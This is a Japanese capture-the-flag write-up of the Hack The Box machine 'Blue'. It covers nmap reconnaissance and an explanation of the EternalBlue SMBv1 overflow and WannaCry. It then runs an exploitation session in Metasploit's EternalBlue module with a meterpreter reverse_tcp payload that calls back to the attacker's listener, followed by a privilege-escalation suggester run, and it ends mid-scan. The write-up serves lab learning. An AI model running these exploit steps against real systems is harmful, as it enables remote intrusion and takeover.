まえがき
この記事はBlueのWriteupになっています📝
普通のWriteupだと内容がかなり少なめになってしまったので、今回はEternalBlueについて簡単に説明していこうと思います。
Machine Info
Name : Blue
IP Address : 10.10.10.40
OS : Windows🪟
Recon
Port Scan - Nmap
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# nmap 10.10.10.40 -Pn -v -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-02 16:16 JST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:16
Completed NSE at 16:16, 0.00s elapsed
Initiating NSE at 16:16
Completed NSE at 16:16, 0.00s elapsed
Initiating NSE at 16:16
Completed NSE at 16:16, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:16
Completed Parallel DNS resolution of 1 host. at 16:16, 0.05s elapsed
Initiating SYN Stealth Scan at 16:16
Scanning 10.10.10.40 [1000 ports]
Discovered open port 445/tcp on 10.10.10.40
Discovered open port 139/tcp on 10.10.10.40
Discovered open port 135/tcp on 10.10.10.40
Discovered open port 49157/tcp on 10.10.10.40
Discovered open port 49153/tcp on 10.10.10.40
Discovered open port 49156/tcp on 10.10.10.40
Discovered open port 49154/tcp on 10.10.10.40
Discovered open port 49155/tcp on 10.10.10.40
Increasing send delay for 10.10.10.40 from 0 to 5 due to 140 out of 465 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 5 to 10 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 10 to 20 due to 14 out of 45 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 20 to 40 due to 11 out of 22 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 40 to 80 due to 11 out of 22 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 80 to 160 due to 11 out of 14 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 160 to 320 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 320 to 640 due to 11 out of 12 dropped probes since last increase.
Increasing send delay for 10.10.10.40 from 640 to 1000 due to 11 out of 11 dropped probes since last increase.
Discovered open port 49152/tcp on 10.10.10.40
Completed SYN Stealth Scan at 16:24, 422.68s elapsed (1000 total ports)
Initiating Service scan at 16:24
Scanning 9 services on 10.10.10.40
Service scan Timing: About 44.44% done; ETC: 16:26 (0:01:14 remaining)
Completed Service scan at 16:25, 63.95s elapsed (9 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.40
Retrying OS detection (try #2) against 10.10.10.40
Retrying OS detection (try #3) against 10.10.10.40
Retrying OS detection (try #4) against 10.10.10.40
Retrying OS detection (try #5) against 10.10.10.40
Initiating Traceroute at 16:25
Completed Traceroute at 16:25, 0.26s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:25
Completed Parallel DNS resolution of 2 hosts. at 16:25, 0.12s elapsed
NSE: Script scanning 10.10.10.40.
Initiating NSE at 16:25
Completed NSE at 16:25, 15.57s elapsed
Initiating NSE at 16:25
Completed NSE at 16:25, 0.00s elapsed
Initiating NSE at 16:25
Completed NSE at 16:25, 0.00s elapsed
Nmap scan report for 10.10.10.40
Host is up (0.29s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/2%OT=135%CT=1%CU=33290%PV=Y%DS=2%DC=T%G=Y%TM=6593
OS:BA6E%P=aarch64-unknown-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=I%CI=I%II=I
OS:%SS=S%TS=7)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8S
OS:T11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=20
OS:00%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=8
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.007 days (since Tue Jan 2 16:15:34 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-01-02T07:25:25+00:00
| smb2-time:
| date: 2024-01-02T07:25:26
|_ start_date: 2024-01-02T07:15:48
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 3s, deviation: 2s, median: 1s
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 260.96 ms 10.10.14.1
2 261.22 ms 10.10.10.40
NSE: Script Post-scanning.
Initiating NSE at 16:25
Completed NSE at 16:25, 0.00s elapsed
Initiating NSE at 16:25
Completed NSE at 16:25, 0.00s elapsed
Initiating NSE at 16:25
Completed NSE at 16:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 515.84 seconds
Raw packets sent: 1782 (81.978KB) | Rcvd: 1108 (47.862KB)
ポートはたくさん開いている。445 Port気になりますねぇ!!
Identification of Vulnerbility
①マシンの名前がBlueであること
②Windows Machineであること
③445 Portが開いていること
正攻法ではないかもだが、この3つからEternalBlueが容易に考えられるだろう。
ここから先は少しだけEternalBlue関することについて説明する。
※Writeupだけ見たい方は読み飛ばしてもらってOK😉
CVE-2017-0144 - EternalBlue
- EternalBlue Leaks
EternalBlueのリークには The Shadow Brokers と呼ばれるハッカーグループが関係している。アメリカ国家安全保障局 NSA のハッキングツールやエクスプロイトを盗み Lost in Translation というメッセージを通して情報公開をした。
Lost in Translation - theshadowbrokers
KEK...last week theshadowbrokers be trying to help peoples.This week theshadowbrokers be thinking fuck peoples. Any other peoples be having same problem? So this week is being about money. TheShadowBrokers showing you cards theshadowbrokers wanting you to be seeing. Sometime peoples not being target audience. Follow the links for the new dumps. Win-dows. Swift. Oddjob. Oh you thought that was it? Some of you peoples is needing reading comprehension.
https://XXXXXXXXXX....
Password = Reeeeeeeeeeeeeee
Lost in Translation - theshadowbrokers 【※限界ちゃん意訳】
wwww.... 先週、The Shadow Brokersは人助けをしようとしてたんだよ。でもさぁ、今週はぶっちゃけ人なんてどうでもいいって感じかな。
同じような問題持っている人いるかな? だからさ、今週は金稼ぎの話をしよっか。
俺たちThe Shadow Brokersがカードを見せたげる! 見てみなよ。誰もがターゲットじゃないってわけさ。新しいリークのリンクを追ってみなよ。Win-dows、Swift、Oddjobのことだ。
おっと、これだけだと思った?ちょっと読解力が足りないバカもいるみたいだね(笑)
https://XXXXXXXXXX....
Password = Reeeeeeeeeeeeeee
FuzzBunchとよばれるエクスプロイト集やDanderSpritzというツールがリンクと共に公開されていた。今現在リンクには飛ぶことは不可能だがgithubには存在する。
このFuzzBunchに今回のEternalBlueも含まれていたのだ。
これらTheShadowBrokersによって行われたリークはサイバーセキュリティ史における重要な出来事となり、多大な影響を持つ大規模なサイバー攻撃のきっかけにもなった。
- How does EternalBlue works
ここからはEternalBlueの仕組みについてみていこう。
EternalBlueの脆弱性はWindows SMBv1(Server Message Block version 1)のプロトコルに関連する。
SMBv1って??
Microsoft社が開発したネットワークファイル共有をするときに決めるお約束事。Windowsシステム間でファイル・プリンタ・その他のネットワークリソースの共有ができるようになる。
肝になってくるのが、SMBv1コード内にあるカーネル関数srv!SrvOs2FeaListToNtちゃん。
srv!SrvOs2FeaListToNtにあるバッファオーバーフローを利用することによって、メモリの非ページプール領域にオーバーフローが発生して不正アクセスができるようになる。....何言っているのかわからん!という人もいるはず。もう少し説明していく。
srv!SrvOs2FeaListToNtはWindows SMBサーバー機能内で拡張ファイル属性(FEA)の サイズ計算に使われる関数。
ほんとは大きいサイズのデータ型なのに小さなデータ型を使用してしまうような、不適切な型変換をすることで実際のデータサイズを反映することができず、FEAサイズ計算をsrv!SrvOs2FeaListToNtちゃんがミスってしまう。
計算をミスるとシステムはFEAデータを格納するためのメモリ領域の幅とりもミスってしまう。
幅とりをミスる(本当はデカいのに小さい幅しか用意しなかった)と、元々あったデータが上書きされてしまう。これがバッファオーバーフローを引き起こす。
この幅とりが行われるメモリ領域のことを非ページプールと呼ばれる。
非ページプールって?
コンピュータのメモリにはRAMとよばれる物理メモリがあり、そこでプログラムやデータが実際に実行やアクセスを行う場所になっている。
コンピュータが物理メモリのデータを効率的に管理する方法の一つとして「ページング」というものがある。ページングをすると、物理メモリ内のデータが「ページ」という小さな単位にわけることができ、必要なデータのみを効率的に扱うことができる。
これを踏まえ、非ページプールとはカーネルが使用するメモリの一部で、ページングの対象にならない領域のことを言う。
すなわち、非ページプール内のデータは物理メモリ上に常駐していて、ページングによるデータ移動はなされない。これによってカーネルが高速で効率的にデータにアクセスすることが可能だ。
この非ページプールで上記のようなことが起きてバッファオーバーフローが引き起こされると、別ドライバのメモリ領域が使用されてしまう。
詳しくは、SRVNET.sysと呼ばれるドライバのメモリ領域が上書きされてしまうことになるのだ。
SMBプロトコルを使用したネットワーク通信をする時にSRVNET.sysは認証やアクセス制御に関する情報を処理する必要がある。このため、認証トークンやセキュリティ関連のデータが一時的にSRVNET.sysのメモリ領域に保存される。
そのため上書きされるということはこれらのリソースやセッション情報、認証データ等が失われてしまうだけでなく、攻撃者がこれらの情報を悪用して不正アクセスを行えてしまうのだ。
- WannaCry
EternalBlueを利用したインシデントは複数あるが、その中でも記憶が鮮明なのがWannaCryだろう。
こんな画面出てきたら、だれでも泣きたくなるよね。
2017年に世界中で大きな被害をもたらしたランサムウェアとワームの複合体だ。
EternalBlueの脆弱性を利用してシステムに侵入すると、感染したマシンのファイルシステムを探索する。探索時には価値のあるデータである、特定のファイル拡張子や重要なファイル・データベース・文書・写真をターゲットにする。
ターゲットにしたファイルをAES(Advances Encryption Standard)という解読するのが非常に難しいアルゴリズムをつかって暗号化をする。
AESやCryptoの勉強をしたい人は分かりやすくまとまっている。これおすすめ。
暗号化プロセスの際、WannaCryは各ファイルに対しての暗号化キーを作る(AESは共通鍵暗号なので、暗号化と複合には同じキーを使用する)。暗号化が終わると、暗号化されたWannaCryは暗号化されたファイルの拡張子を「.WCRY」や「.WCRYT」に変更する。
仮想通貨であるビットコイン等で身代金を払うことで、復号の際のキーが渡される場合があるが復号という絶対的な保証はできない。
WannaCryによって数十億ドル以上の経済的損失が起き、世界的な影響を及ぼした。
今回の最も直接的な原因としては、やはりセキュリティパッチの未適用だろう。MicrosoftはEternalBlueに対する修正プログラムを提供していたにもかかわらず、多くの組織や個人は適用していなかったのが現実。
このWannaCryが発生して以降、全体的にセキュリティ意識が向上したかもしれない。でも、組織や個人で未だにセキュリティパッチを適用していないのを結構見かける。
結局、同じ過ちを繰り返すことになってしまうのだろうか...。個々のセキュリティ意識に関しても今後の課題点であることも改めて自分も考えさせられた。
Exploit the Vulnerbility
さて、EternalBlueと見当がついたところで実際に攻撃を仕掛けていこう。
metasploit
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# msfconsole
Metasploit tip: You can upgrade a shell to a Meterpreter session on many
platforms using sessions -u <session_id>
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.3.43-dev ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search eternal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
search eternalで探すと早速みつかる。このモジュールを使ってエクスプロイトしていこう。
show optionsで必要箇所の設定を確認しながら、設定を行なっていく。
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/
basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Wind
ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines
.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 200
8 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.236.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
実行する。
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.40:49158) at 2024-01-02 16:38:18 +0900
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
ちゃんとささってくれたようですね。とりあえずルートディレクトリに移動する。
C:\Windows\system32>cd /
cd /
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\
14/07/2009 03:20 <DIR> PerfLogs
18/02/2022 15:02 <DIR> Program Files
14/07/2017 16:58 <DIR> Program Files (x86)
14/07/2017 13:48 <DIR> Share
21/07/2017 06:56 <DIR> Users
02/01/2024 07:20 <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 3,031,953,408 bytes free
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users
21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Administrator
14/07/2017 13:45 <DIR> haris
12/04/2011 07:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 3,031,953,408 bytes free
harisというユーザーを発見できる。harisのデスクトップ下まで移動してみよう。
C:\Users>cd haris
cd haris
C:\Users\haris>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users\haris
14/07/2017 13:45 <DIR> .
14/07/2017 13:45 <DIR> ..
15/07/2017 07:58 <DIR> Contacts
24/12/2017 02:23 <DIR> Desktop
15/07/2017 07:58 <DIR> Documents
15/07/2017 07:58 <DIR> Downloads
15/07/2017 07:58 <DIR> Favorites
15/07/2017 07:58 <DIR> Links
15/07/2017 07:58 <DIR> Music
15/07/2017 07:58 <DIR> Pictures
15/07/2017 07:58 <DIR> Saved Games
15/07/2017 07:58 <DIR> Searches
15/07/2017 07:58 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 3,031,953,408 bytes free
C:\Users\haris>cd Desktop
cd Desktop
C:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users\haris\Desktop
24/12/2017 02:23 <DIR> .
24/12/2017 02:23 <DIR> ..
02/01/2024 07:16 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,031,953,408 bytes free
C:\Users\haris\Desktop>type user.txt
type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のUserFlag
Privilege Escalation
結論から先に書くと、今回は権限昇格する必要性がない。自分は確認不足だったためsuggesterを使って権限昇格を試してしまった。反省である。
C:\Users\haris\Desktop>^Z
Background channel 1? [y/N] y
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/smb/ms17_010_eternalblue) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.40 - Collecting local exploits for x64/windows...
[*] 10.10.10.40 - 188 exploit checks are being tried...
[+] 10.10.10.40 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.40 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.10.10.40 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.40 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 10.10.10.40 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.40 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.40 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.40 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.40 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.40 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.40 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.40 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.40 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 45 / 45
[*] 10.10.10.40 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2019_1458_wizardopium Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/cve_2020_1054_drawiconex_lpe Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2021_40449 Yes The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
6 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
7 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
8 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
9 exploit/windows/local/ms16_014_wmi_recv_notif Yes The target appears to be vulnerable.
10 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
11 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
12 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
13 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
14 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
15 exploit/windows/local/always_install_elevated No The target is not exploitable.
16 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
17 exploit/windows/local/bypassuac_dotnet_profiler No The target is not exploitable.
18 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
19 exploit/windows/local/bypassuac_sdclt No The target is not exploitable.
20 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
21 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
22 exploit/windows/local/capcom_sys_exec No The target is not exploitable.
23 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
24 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
25 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
26 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
27 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
28 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
29 exploit/windows/local/cve_2022_21882_win32k No The target is not exploitable.
30 exploit/windows/local/cve_2022_21999_spoolfool_privesc No The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.
31 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
32 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
33 exploit/windows/local/cve_2023_28252_clfs_driver No The target is not exploitable. The target system does not have clfs.sys in system32\drivers\
34 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
35 exploit/windows/local/ikeext_service No The check raised an exception.
36 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
37 exploit/windows/local/ms15_078_atmfd_bof No The target is not exploitable.
38 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
39 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
40 exploit/windows/local/panda_psevents No The target is not exploitable.
41 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
42 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
43 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
44 exploit/windows/local/webexec No The check raised an exception.
45 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable.
[*] Post module execution completed
ここで試してみるとこんなメッセージが出てくる。
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set session 1
session => 1
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set lhost 10.10.14.4
lhost => 10.10.14.4
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
これね。つまり...まあ、、そういうことだ。
[-] Exploit aborted due to failure: none: Session is already elevated
では先ほどのセッションに戻ってRootフラグ取得に戻ろう。Administratorに移動。
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users
21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Administrator
14/07/2017 13:45 <DIR> haris
12/04/2011 07:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,695,577,600 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users\Administrator
21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Contacts
24/12/2017 02:22 <DIR> Desktop
21/07/2017 06:56 <DIR> Documents
18/02/2022 15:21 <DIR> Downloads
21/07/2017 06:56 <DIR> Favorites
21/07/2017 06:56 <DIR> Links
21/07/2017 06:56 <DIR> Music
21/07/2017 06:56 <DIR> Pictures
21/07/2017 06:56 <DIR> Saved Games
21/07/2017 06:56 <DIR> Searches
21/07/2017 06:56 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 2,695,577,600 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users\Administrator\Desktop
24/12/2017 02:22 <DIR> .
24/12/2017 02:22 <DIR> ..
02/01/2024 07:16 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,695,577,600 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のRootFlag
無事Rootもとれた。
正攻法...?
ハッキングにおいてReconが重要になってくるが今回は有名な脆弱性であった為、予想でハックできた。script=vulnで探索をかけるとしっかりと脆弱性のエビデンスが取れる為、こちらの方がいいだろう。
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# nmap 10.10.10.40 -Pn -v --script=vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-02 16:30 JST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:30
